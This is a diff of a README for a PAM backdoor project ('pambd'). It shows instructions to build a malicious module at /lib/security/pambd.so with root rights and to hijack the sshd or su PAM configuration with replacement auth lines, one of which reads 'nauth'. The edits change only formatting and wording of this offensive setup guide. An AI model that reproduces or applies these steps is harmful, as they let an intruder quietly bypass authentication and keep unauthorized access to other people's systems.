ociredefz/pambd/README.md

 After that, generate the pam backdoor with:
 (It needs the root permissions)

-    deftcode ~ $ sudo sh gen.sh
+    deftcode pambd $ sudo sh gen.sh

-This will generate the pam backdoor at /lib/security/pambd.so
+This will generate the pam backdoor at **/lib/security/pambd.so**.

 Configure the PAM service you want to hijack
 --------------------------------------------

-Edit the **/etc/pam.d/sshd** or others that use PAM like **su** and then replace the content with these lines:
+Edit the **/etc/pam.d/sshd** or other that use PAM like **/etc/pam.d/su** and then replace the content with these lines:

     nauth           sufficient      pam_rootok.so
     auth            sufficient      pam_unix.so     # This must be 'sufficient'.